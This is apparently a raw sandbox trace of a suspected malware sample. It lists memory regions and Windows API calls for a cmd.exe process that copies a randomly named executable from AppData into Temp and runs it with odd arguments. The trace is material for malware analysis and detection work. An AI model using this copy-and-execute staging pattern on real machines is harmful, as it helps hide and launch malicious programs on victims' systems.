0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 673 start_va = 0x10000 end_va = 0x1ffff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 674 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 675 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 676 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 677 start_va = 0x4b0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 678 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 679 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 680 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 681 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 682 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 683 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = 
mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 684 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 685 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 686 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 687 start_va = 0x4c0000 end_va = 0x587fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 688 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 689 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 690 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 691 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 692 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 693 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 694 start_va = 0x590000 end_va = 0x690fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 695 start_va = 0x6a0000 end_va = 0x129ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 696 start_va = 0x12a0000 end_va = 0x1402fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012a0000" filename = "" Region: id = 774 start_va = 0x1410000 end_va = 0x16defff entry_point = 0x1410000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 866 start_va = 0x400000 end_va = 0x481fff entry_point = 0x400000 region_type = mapped_file name = "nhsgkr2p.exe" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\nhsgkr2p.exe") Thread: id = 7 os_tid = 0xad8 [0094.091] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fed4 | out: lpSystemTimeAsFileTime=0x26fed4*(dwLowDateTime=0x76fcba80, dwHighDateTime=0x1d440a9)) [0094.091] GetCurrentProcessId () returned 0xad4 [0094.091] GetCurrentThreadId () returned 0xad8 [0094.091] GetTickCount () returned 0x22d08 [0094.092] QueryPerformanceCounter (in: lpPerformanceCount=0x26fecc | out: lpPerformanceCount=0x26fecc*=15088073050) returned 1 [0094.092] GetModuleHandleA (lpModuleName=0x0) returned 0x4a0f0000 [0094.092] __set_app_type (_Type=0x1) [0094.092] __p__fmode () returned 0x76b331f4 [0094.092] __p__commode () returned 0x76b331fc [0094.092] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1121a6) returned 0x0 [0094.092] __getmainargs (in: _Argc=0x4a114238, _Argv=0x4a114240, _Env=0x4a11423c, _DoWildCard=0, _StartInfo=0x4a114140 | out: _Argc=0x4a114238, _Argv=0x4a114240, _Env=0x4a11423c) returned 0 [0094.092] GetCurrentThreadId () returned 0xad8 [0094.093] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xad8) 
returned 0x38 [0094.093] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0094.093] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0094.093] SetThreadUILanguage (LangId=0x0) returned 0x409 [0094.093] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0094.093] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fe64 | out: phkResult=0x26fe64*=0x0) returned 0x2 [0094.093] VirtualQuery (in: lpAddress=0x26fe9b, lpBuffer=0x26fe34, dwLength=0x1c | out: lpBuffer=0x26fe34*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0094.093] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fe34, dwLength=0x1c | out: lpBuffer=0x26fe34*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0094.093] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fe34, dwLength=0x1c | out: lpBuffer=0x26fe34*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0094.094] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26fe34, dwLength=0x1c | out: lpBuffer=0x26fe34*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0094.094] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fe34, dwLength=0x1c | out: lpBuffer=0x26fe34*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x90000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0094.094] GetConsoleOutputCP () returned 0x1b5 [0094.094] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 
[0094.094] SetConsoleCtrlHandler (HandlerRoutine=0x4a10e72a, Add=1) returned 1 [0094.094] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.094] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0094.094] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.094] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0094.094] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.094] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0094.094] _get_osfhandle (_FileHandle=0) returned 0x3 [0094.094] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0094.094] _get_osfhandle (_FileHandle=0) returned 0x3 [0094.094] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0094.095] GetEnvironmentStringsW () returned 0x310388* [0094.095] FreeEnvironmentStringsW (penv=0x310388) returned 1 [0094.095] GetEnvironmentStringsW () returned 0x310388* [0094.095] FreeEnvironmentStringsW (penv=0x310388) returned 1 [0094.095] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26edd4 | out: phkResult=0x26edd4*=0x40) returned 0x0 [0094.095] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26eddc, lpData=0x26ede0, lpcbData=0x26edd8*=0x1000 | out: lpType=0x26eddc*=0x0, lpData=0x26ede0*=0x38, lpcbData=0x26edd8*=0x1000) returned 0x2 [0094.095] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26eddc, lpData=0x26ede0, lpcbData=0x26edd8*=0x1000 | out: lpType=0x26eddc*=0x4, lpData=0x26ede0*=0x1, lpcbData=0x26edd8*=0x4) returned 0x0 [0094.095] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26eddc, lpData=0x26ede0, lpcbData=0x26edd8*=0x1000 | out: lpType=0x26eddc*=0x0, lpData=0x26ede0*=0x1, lpcbData=0x26edd8*=0x1000) returned 0x2 [0094.095] RegQueryValueExW (in: hKey=0x40, 
lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26eddc, lpData=0x26ede0, lpcbData=0x26edd8*=0x1000 | out: lpType=0x26eddc*=0x4, lpData=0x26ede0*=0x0, lpcbData=0x26edd8*=0x4) returned 0x0 [0094.095] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26eddc, lpData=0x26ede0, lpcbData=0x26edd8*=0x1000 | out: lpType=0x26eddc*=0x4, lpData=0x26ede0*=0x40, lpcbData=0x26edd8*=0x4) returned 0x0 [0094.095] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26eddc, lpData=0x26ede0, lpcbData=0x26edd8*=0x1000 | out: lpType=0x26eddc*=0x4, lpData=0x26ede0*=0x40, lpcbData=0x26edd8*=0x4) returned 0x0 [0094.095] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26eddc, lpData=0x26ede0, lpcbData=0x26edd8*=0x1000 | out: lpType=0x26eddc*=0x0, lpData=0x26ede0*=0x40, lpcbData=0x26edd8*=0x1000) returned 0x2 [0094.095] RegCloseKey (hKey=0x40) returned 0x0 [0094.095] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26edd4 | out: phkResult=0x26edd4*=0x40) returned 0x0 [0094.095] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26eddc, lpData=0x26ede0, lpcbData=0x26edd8*=0x1000 | out: lpType=0x26eddc*=0x0, lpData=0x26ede0*=0x40, lpcbData=0x26edd8*=0x1000) returned 0x2 [0094.096] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26eddc, lpData=0x26ede0, lpcbData=0x26edd8*=0x1000 | out: lpType=0x26eddc*=0x4, lpData=0x26ede0*=0x1, lpcbData=0x26edd8*=0x4) returned 0x0 [0094.096] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26eddc, lpData=0x26ede0, lpcbData=0x26edd8*=0x1000 | out: lpType=0x26eddc*=0x0, lpData=0x26ede0*=0x1, lpcbData=0x26edd8*=0x1000) returned 0x2 [0094.096] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26eddc, 
lpData=0x26ede0, lpcbData=0x26edd8*=0x1000 | out: lpType=0x26eddc*=0x4, lpData=0x26ede0*=0x0, lpcbData=0x26edd8*=0x4) returned 0x0 [0094.096] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26eddc, lpData=0x26ede0, lpcbData=0x26edd8*=0x1000 | out: lpType=0x26eddc*=0x4, lpData=0x26ede0*=0x9, lpcbData=0x26edd8*=0x4) returned 0x0 [0094.096] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26eddc, lpData=0x26ede0, lpcbData=0x26edd8*=0x1000 | out: lpType=0x26eddc*=0x4, lpData=0x26ede0*=0x9, lpcbData=0x26edd8*=0x4) returned 0x0 [0094.096] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26eddc, lpData=0x26ede0, lpcbData=0x26edd8*=0x1000 | out: lpType=0x26eddc*=0x0, lpData=0x26ede0*=0x9, lpcbData=0x26edd8*=0x1000) returned 0x2 [0094.096] RegCloseKey (hKey=0x40) returned 0x0 [0094.096] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886349 [0094.096] srand (_Seed=0x5b886349) [0094.096] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" [0094.096] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" [0094.096] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0094.096] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x311ae8, nSize=0x104 | out: 
lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0094.096] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0094.096] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0094.096] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0094.096] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0094.096] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0094.096] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0094.097] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0094.097] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0094.097] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0094.097] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0094.097] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0094.097] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0094.097] GetEnvironmentStringsW () returned 0x3124d8* [0094.097] FreeEnvironmentStringsW (penv=0x3124d8) returned 1 [0094.097] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.097] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0094.097] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0094.097] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0094.097] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0094.097] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 
[0094.097] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0094.097] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0094.097] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0094.097] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0094.097] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26fba0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0094.097] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26fba0, lpFilePart=0x26fb9c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26fb9c*="Desktop") returned 0x18 [0094.097] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0094.097] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f91c | out: lpFindFileData=0x26f91c) returned 0x310b68 [0094.097] FindClose (in: hFindFile=0x310b68 | out: hFindFile=0x310b68) returned 1 [0094.097] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f91c | out: lpFindFileData=0x26f91c) returned 0x310b68 [0094.098] FindClose (in: hFindFile=0x310b68 | out: hFindFile=0x310b68) returned 1 [0094.098] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f91c | out: lpFindFileData=0x26f91c) returned 0x310b68 [0094.098] FindClose (in: hFindFile=0x310b68 | out: hFindFile=0x310b68) returned 1 [0094.098] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0094.098] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0094.098] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0094.098] GetEnvironmentStringsW () returned 0x310388* [0094.098] FreeEnvironmentStringsW (penv=0x310388) returned 1 [0094.098] GetCurrentDirectoryW (in: nBufferLength=0x104, 
lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0094.098] GetConsoleOutputCP () returned 0x1b5 [0094.099] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0094.099] GetUserDefaultLCID () returned 0x409 [0094.099] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a114950, cchData=8 | out: lpLCData=":") returned 2 [0094.099] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26fce0, cchData=128 | out: lpLCData="0") returned 2 [0094.099] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26fce0, cchData=128 | out: lpLCData="0") returned 2 [0094.099] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26fce0, cchData=128 | out: lpLCData="1") returned 2 [0094.099] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a114940, cchData=8 | out: lpLCData="/") returned 2 [0094.099] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a114d80, cchData=32 | out: lpLCData="Mon") returned 4 [0094.099] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a114d40, cchData=32 | out: lpLCData="Tue") returned 4 [0094.099] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a114d00, cchData=32 | out: lpLCData="Wed") returned 4 [0094.099] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a114cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0094.099] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a114c80, cchData=32 | out: lpLCData="Fri") returned 4 [0094.099] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a114c40, cchData=32 | out: lpLCData="Sat") returned 4 [0094.099] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a114c00, cchData=32 | out: lpLCData="Sun") returned 4 [0094.099] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a114930, cchData=8 | out: lpLCData=".") returned 2 [0094.099] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a114920, cchData=8 | out: lpLCData=",") returned 2 
[0094.099] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0094.100] GetConsoleTitleW (in: lpConsoleTitle=0x300a10, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.100] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0094.100] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0094.100] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0094.100] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0094.101] _wcsicmp (_String1="type", _String2=")") returned 75 [0094.101] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0094.101] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0094.101] _wcsicmp (_String1="IF", _String2="type") returned -11 [0094.101] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0094.101] _wcsicmp (_String1="REM", _String2="type") returned -2 [0094.101] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0094.105] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\"") returned 68 [0094.105] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\"") returned 68 [0094.105] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\"") returned 71 [0094.105] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\"") returned 71 [0094.105] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\"") returned 80 [0094.105] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\"") returned 80 [0094.107] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.107] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.107] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.107] GetFileType (hFile=0x7) 
returned 0x2 [0094.107] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0094.107] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26fb74 | out: lpMode=0x26fb74) returned 1 [0094.107] _dup (_FileHandle=1) returned 3 [0094.108] _close (_FileHandle=1) returned 0 [0094.108] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe", _String2="con") returned -53 [0094.108] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\nhsgkr2p.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x26fb44, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0094.108] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0094.108] GetConsoleTitleW (in: lpConsoleTitle=0x26f974, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.109] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0094.109] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0094.109] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0094.109] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0094.109] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0094.110] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x26f4d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f4d8) returned 0x300f68 [0094.110] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0094.110] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0094.110] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0094.110] CreateFileW 
(lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x26e3e4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0094.110] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0094.110] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.110] GetFileType (hFile=0x54) returned 0x1 [0094.110] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.110] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x26e43c | out: lpFileSizeHigh=0x26e43c*=0x0) returned 0x7d600 [0094.110] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.110] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.110] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.110] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.111] GetFileType (hFile=0x4c) returned 0x1 [0094.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.111] GetFileType (hFile=0x4c) returned 0x1 [0094.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.111] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.112] GetFileType (hFile=0x4c) returned 0x1 [0094.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.112] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, 
